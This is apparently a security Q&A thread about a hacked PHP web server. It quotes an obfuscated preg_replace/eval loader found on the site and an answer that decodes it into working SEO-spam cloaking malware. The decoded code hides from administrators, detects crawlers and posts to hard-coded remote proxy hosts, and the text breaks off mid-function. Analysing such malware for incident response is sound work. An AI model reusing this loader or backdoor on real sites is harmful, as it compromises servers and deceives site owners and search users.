1

We have found this on a hacked PHP webserver. It was in a single file. This file was included from somewhere else with @require. That's what we know:

  • This site is running PHP 5.3
  • The site had thousands of 'Viagra' type URLs that were crawled by Google
  • It obviously works by using the preg_replace /e - modifier, but what gets eval'ed there we do not understand.

(this is prefixed by a normal < ?php which I am not able to post here):

Error_Reporting(0); 
$xwGla1FMTSLs="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";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doR1ZFZHJlbUl5WkZKWGJVVXpVRmRLYUdNeVZUSk9SamxyV2xkT2RscEhWVzlKYkd4MFVtNXdZVlpHYTNkWFJFcFRZa1pyZVU5WGRHRlZWREE1U1dsck4wcElhR3BXUkd3MllsUldTbUV5WnpSUVYwcG9ZekpWTWs1R09XdGFWMDUyV2tkVmIwbHRUWHBWYm14cFVqRmFNVWxwYXpkS1NHaDVWVlZhY0dKc1JUTlBSemxOVFZReGFWbFlUbXhPYWxKbVdrZFdhbUl5VW14TFEwcGFUVzFvTlVscGF6ZEtTR2hvV214R01XRnFXakJYYTFaS1VGZEthR015VlRKT1JqbHJXbGRPZGxwSFZXOUpiVWw2VTIxemFVdFVjMnRsUkZwclVraE9ORlpyVm5GVGJFNVdWSG94YVZsWVRteE9hbEptV2tkV2FtSXlVbXhMUTBwaFRUTkNkMWx0TVdGak1XeFpWVzEzYVV0VWN6MGlLU2s3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NKS1NHZ3pVako0YUUxVldrNVdSazVOWTNvd2EyVkVXbXRTU0U0MFZtdFdjVk5zVGxaVWVXZHJaVVZXVFdGVVRuWmFNVVpoV1ZSamIwcElhRE5TTW5ob1RWVmFUbFpHVGsxamVXdHdUM2xTTkU5SVl6UmtSa0pxWWxkNFNrOVViRTlRVTFJMFdURlJOV1Z0TURGVFYzUnZUME5uYTJWSVpFaGlSMFY0VW1zeFZWVXdlSHBMVkhNOUlpa3BPdz09IikpO2V2YWwoYmFzZTY0X2RlY29kZSgiSkhoclJHWkdWV3N5V1ZkSk9GSTlKeWM3Wm05eUtDUjRSbTVKWlhkV2FWcGxkVmxJUFRBN0pIaEdia2xsZDFacFdtVjFXVWc4SkhnNGR6aDBVR050YkVrNU9VNDdKSGhHYmtsbGQxWnBXbVYxV1Vnckt5bDdKSGhyUkdaR1ZXc3lXVmRKT0ZJdVBTUjRjbEZHYVc1Uk56aHZUREVvS0NSNFlXWlJkV28yZEZwRlNTZ2tlSGRIYkdFeFJrMVVVMHh6V3lSNFJtNUpaWGRXYVZwbGRWbElYU2xlTVRZNE9EYzVPRFUzTVNrcE8zMWxkbUZzS0NSNGEwUm1SbFZyTWxsWFNUaFNLVHM9IikpOw=='\x29\x29\x3B",".");
return; 
?>

I try to be more specific about the background. I hope this helps to get more on-topic.

topic: incident response

what assets you are trying to protect: This is a public webserver serving a PHP Typo3 website with a product catalogue.

Jonas Eberle
  • 131
  • 1
  • 5
  • Seems Base64 encoding is being used. There's an online decoder available at https://isc.sans.edu/tools/base64.html – user2320464 Feb 22 '16 at 19:02

1 Answers1

13

The underlying concept here is that preg_replace is being used like this:

preg_replace("/.*/e", "long string", ".");

Which means: in the string "." replace 0 or more instances of . with long string and run that.

Now long string appears to just be encoded by using unicode escape codes (\x65 is A. Unobfuscated it is:

eval(base64_decode('long base64 string'));

Long base64 string decoded is:

eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGhGVEdremIyZFJXbUUzUFdKaGMyVTJORjlrWldOdlpHVW9JbGx0Um5wYVZGa3dXREpTYkZreU9XdGFVVDA5SWlrN0pIaGpWRGw2YlRWSmEyZzRQV0poYzJVMk5GOWtaV052WkdVb0ltTXpVbmxpUjFaMUlpazdKSGh5VVVacGJsRTNPRzlNTVQxaVlYTmxOalJmWkdWamIyUmxLQ0paTW1oNUlpazdKSGhoWmxGMWFqWjBXa1ZKUFdKaGMyVTJORjlrWldOdlpHVW9JbUl6U21zaUtUc2tlRFprUkhONFZrVnFTbE5WVHoxaVlYTmxOalJmWkdWamIyUmxLQ0phTTNCd1ltMWFjMWxZVW13aUtUcz0iKSk7ZXZhbChiYXNlNjRfZGVjb2RlKCJKSGgzUjJ4aE1VWk5WRk5NY3owa2VEWmtSSE40VmtWcVNsTlZUeWdrZUVWTWFUTnZaMUZhWVRjb0pIaDNSMnhoTVVaTlZGTk1jeWtwT3lSNE9IYzRkRkJqYld4Sk9UbE9QU1I0WTFRNWVtMDFTV3RvT0Nna2VIZEhiR0V4UmsxVVUweHpLVHM9IikpOw=="));eval(base64_decode("JHhrRGZGVWsyWVdJOFI9Jyc7Zm9yKCR4Rm5JZXdWaVpldVlIPTA7JHhGbklld1ZpWmV1WUg8JHg4dzh0UGNtbEk5OU47JHhGbklld1ZpWmV1WUgrKyl7JHhrRGZGVWsyWVdJOFIuPSR4clFGaW5RNzhvTDEoKCR4YWZRdWo2dFpFSSgkeHdHbGExRk1UU0xzWyR4Rm5JZXdWaVpldVlIXSleMTY4ODc5ODU3MSkpO31ldmFsKCR4a0RmRlVrMllXSThSKTs="));

If we keep decoding the base64 we get:

$xwGla1FMTSLs="xTxrU+NIkqyQLFlhy90Qh6U1WBO0aWjPYLhdHY...NEP8rp5NGq1OkIxKOJWpw5HZiWECu9GLi+7fm9SJzvErMBkeJ///Z/";

$xELi3ogQZa7=base64_decode("YmFzZTY0X2RlY29kZQ==");$xcT9zm5Ikh8=base64_decode("c3RybGVu");$xrQFinQ78oL1=base64_decode("Y2hy");$xafQuj6tZEI=base64_decode("b3Jk");$x6dDsxVEjJSUO=base64_decode("Z3ppbmZsYXRl");

$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);

$xwGla1FMTSLs=$x6dDsxVEjJSUO($xELi3ogQZa7($xwGla1FMTSLs));$x8w8tPcmlI99N=$xcT9zm5Ikh8($xwGla1FMTSLs);

After a bunch of deobfuscation steps like these we get (via unphp)

<?php error_reporting(0);
if (isset($_COOKIE['engine_ssl_'])) {
    return true;
}
if (stripos($_SERVER['HTTP_USER_AGENT'], 'selfbot') !== false) {
    return true;
}
$proxy_array = array("http://159.8.34.18/~roboatom/proxy.php", "http://190.123.47.134/proxy.php", "http://109.236.91.19/proxy.php");
$scriptver = '009';
$hostname = @$_SERVER['HTTP_HOST'];
$hostname = strtolower($hostname);
$hostname = str_replace("www.", "", $hostname);
$cookie_host = $hostname;
$work = FALSE;
$morda = FALSE;
$visitoragent = $_SERVER['HTTP_USER_AGENT'];
$selfagent = 'selfbot';
$workagent = 'fsbot';
$admin = 'antonio';
if (isset($_SERVER['HTTP_REFERER'])) {
    $referer = $_SERVER['HTTP_REFERER'];
} else {
    $referer = 'NOREF';
}
$lg = FSLanguage::get();
$lg = array_flip($lg);
$visitorlang = trim($lg[1]);
$tirnum = strpos($visitorlang, "-");
$visitorlang = substr($visitorlang, 0, $tirnum);
$visitorip = FsGetRealIp();
$method = find_Rpermition();
$url = curPageURLSS();
$url = strtolower($url);
$checkmorda = $url;
$checkmorda = str_replace('http://', '', $checkmorda);
$checkmorda = str_replace('https://', '', $checkmorda);
$checkmorda = str_replace('www.', '', $checkmorda);
$checkmorda = str_replace($hostname, '', $checkmorda);
if (($checkmorda == '/') || ($checkmorda == '/index.php')) {
    $morda = TRUE;
}
$tmppath = "/tmp";
$filessavepath = $tmppath . '/' . md5($hostname) . '/';
if (!is_dir($filessavepath)) {
    mkdir($filessavepath, 0777);
}
if (!is_dir($filessavepath)) {
    $tmppath = dirname(__FILE__);
    $filessavepath = $tmppath . '/' . md5($hostname) . '/';
    mkdir($filessavepath, 0777);
}
$BotList = $tmppath . '/f16f9a406c937f83b17317e1ca6cc3e7';
$filename = $url;
$filename = str_replace('https://', '', $filename);
$filename = str_replace('http://', '', $filename);
$filename = str_replace('www.', '', $filename);
$filename = md5($filename);
$selfinfo = __FILE__;
$selfarray = pathinfo($selfinfo);
$selfpath = $selfarray['dirname'] . '/' . $selfarray['basename'];
$selfpath = base64_encode($selfpath);
if ((preg_match('/admin|wp-login.php|wp-admin|administrator/i', $_SERVER['REQUEST_URI'])) && (!preg_match('/ajax/i', $_SERVER['REQUEST_URI']))) {
    setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
}
foreach ((array)$_COOKIE as $cookie => $value) {
    if (stristr($cookie, 'wordpress_logged_in_')) {
        setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
        return true;
    }
    if (stristr($cookie, 'activeProfile')) {
        setcookie('engine_ssl_', 'enabled', time() + 3600 * 24 * 100, '/', '.' . $cookie_host);
        return true;
    }
}
//////////////FUNCTIONS START
class FSLanguage {
    private static $language = null;
    public static function get() {
        new FSLanguage;
        return self::$language;
    }
    public static function getBestMatch($langs = array()) {
        foreach ($langs as $n => $v) $langs[$n] = strtolower($v);
        $r = array();
        foreach (self::get() as $l => $v) {
            ($s = strtok($l, '-')) != $l && $r[$s] = 0;
            if (in_array($l, $langs)) return $l;
        }
        foreach ($r as $l => $v) if (in_array($l, $langs)) return $l;
        return null;
    }
    private function __construct() {
        if (self::$language !== null) return;
        if (($list = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']))) {
            if (preg_match_all('/([a-z]{1,8}(?:-[a-z]{1,8})?)(?:;q=([0-9.]+))?/', $list, $list)) {
                self::$language = array_combine($list[1], $list[2]);
                foreach (self::$language as $n => $v) self::$language[$n] = + $v ? +$v : 1;
                arsort(self::$language);
            }
        } else self::$language = array();
    }
}
function curl_redir_exec($ch) {
    static $curl_loops = 0;
    static $curl_max_loops = 3;
    if ($curl_loops >= $curl_max_loops) {
        $curl_loops = 0;
        return false;
    }
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    list($header, $data) = explode("

", $data, 2);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    if ($http_code == 301 || $http_code == 302) {
        $matches = array();
        preg_match('/Location:(.*?)
/', $header, $matches);
        $url = @parse_url(trim(array_pop($matches)));
        if (!$url) {
            $curl_loops = 0;
            return $data;
        }
        $last_url = parse_url(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL));
        if (!$url['scheme']) $url['scheme'] = $last_url['scheme'];
        if (!$url['host']) $url['host'] = $last_url['host'];
        if (!$url['path']) $url['path'] = $last_url['path'];
        $new_url = $url['scheme'] . '://' . $url['host'] . $url['path'] . ($url['query'] ? '?' . $url['query'] : '');
        curl_setopt($ch, CURLOPT_URL, $new_url);
        return curl_redir_exec($ch);
    } else {
        $curl_loops = 0;
        return $data;
    }
}
function FsGetRealIp() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
function curPageURLSS() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {
        $pageURL.= "s";
    }
    $pageURL.= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
        $pageURL.= $_SERVER["SERVER_NAME"] . ":" . $_SERVER["SERVER_PORT"] . $_SERVER["REQUEST_URI"];
    } else {
        $pageURL.= $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
    }
    return $pageURL;
}
function find_Rpermition() {
    $res = "";
    if ((function_exists('curl_init')) && (function_exists('curl_exec'))) {
        $res = "curl";
    } elseif (function_exists('fsockopen')) {
        $res = "fsock";
    }
    return $res;
}
function getRdata($page, $useragent, $method, $collection) {
    $result = '';
    $timeout = 15;
    $newRRR = parse_url($page);
    $url_new = $newRRR['host'];
    $path_new = $newRRR['path'];
    if ($method == "curl") {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $page);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);
        curl_redir_exec($ch, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        if ($useragent <> 'selfbot') {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, 'collection=' . $collection);
        }
        $result = curl_exec($ch);
        curl_close($ch);
        $pos = strpos($result, "

");
        $result = substr($result, $pos + 4);
        return $result;
    }
    if ($method == "fsock") {
        $socket = fsockopen($url_new, 80, $errno, $errstr, 30);
        if (!$socket) die("$errstr($errno)");
        $data = '';
        if ($useragent <> 'selfbot') {
            $data = "collection=" . urlencode($collection);
        }
        fwrite($socket, "POST " . $path_new . " HTTP/1.0
");
        fwrite($socket, "Host: " . $url_new . "
");
        fwrite($socket, "Content-type: application/x-www-form-urlencoded
");
        fwrite($socket, "Content-length:" . strlen($data) . "
");
        fwrite($socket, "Accept:*/*
");
        fwrite($socket, "User-agent:" . $useragent . "
");
        fwrite($socket, "Connection:Close
");
        fwrite($socket, "
");
        fwrite($socket, "$data
");
        fwrite($socket, "
");
        $result = '';
        while (!feof($socket)) {
            $result.= fgets($socket);
        }
        $pos = strpos($result, "

");
        $result = substr($result, $pos + 4);
        return $result;
        fclose($socket);
    }
}
function makebotlist($BotList) {
    if (!file_exists($BotList) or (time() - filemtime($BotList) >= '100000')) {
        $baseg = explode("#", file_get_contents('http://ru.myip.ms/files/bots/live_webcrawlers.txt'));
        for ($i = 0;$i < count($baseg);$i++) {
            if (strlen($baseg[$i]) > 10) {
                if (stristr($baseg[$i], "google")) {
                    $basec = explode("
", $baseg[$i]);
                    for ($i2 = 0;$i2 < count($basec);$i2++) {
                        if (preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $basec[$i2])) {
                            $basegoogle[] = $basec[$i2];
                        }
                    }
                }
            }
        }
        $basegoogle = array_unique($basegoogle);
        $basegoogle = implode(PHP_EOL, $basegoogle);
        $file = fopen($BotList, "w+");
        fwrite($file, $basegoogle);
        fclose($file);
    }
}
function HiGoogle($visitorip, $BotList, $lng) {
    $VisitorHost = strtolower(gethostbyaddr($visitorip));
    if (preg_match('/google|bing|aol|yahoo|yandex|majestic|ahrefs|msn|baidu|facebook/i', $VisitorHost)) {
        return true;
    }
    if (is_file($BotList)) {
        $iplist = file_get_contents($BotList);
        $iplist = explode("
", $iplist);
        if (in_array($visitorip, $iplist)) {
            return true;
        }
    }
    if ($lng == '') {
        return true;
    }
    if (preg_match('/93.190.141.195|191.101.22.10|141.255.161.176/i', $visitorip)) {
        return true;
    }
    return false;
}
function checkDir($pap) {
    $f = "0";
    if ($handle = opendir($pap)) {
        while (false !== ($file = readdir($handle))) {
            if ($file != '..' AND $file != '.') {
                $f++;
            }
        }
    }
    closedir($handle);
    return $f;
}
function check($param1, $param2) {
    return strpos(strtolower($param1), strtolower($param2));
}
function callback($datapage) {
    global $links_out;
    $_9 = $links_out;
    $_2 = 7;
    $_10 = $datapage;
    $_11 = false;
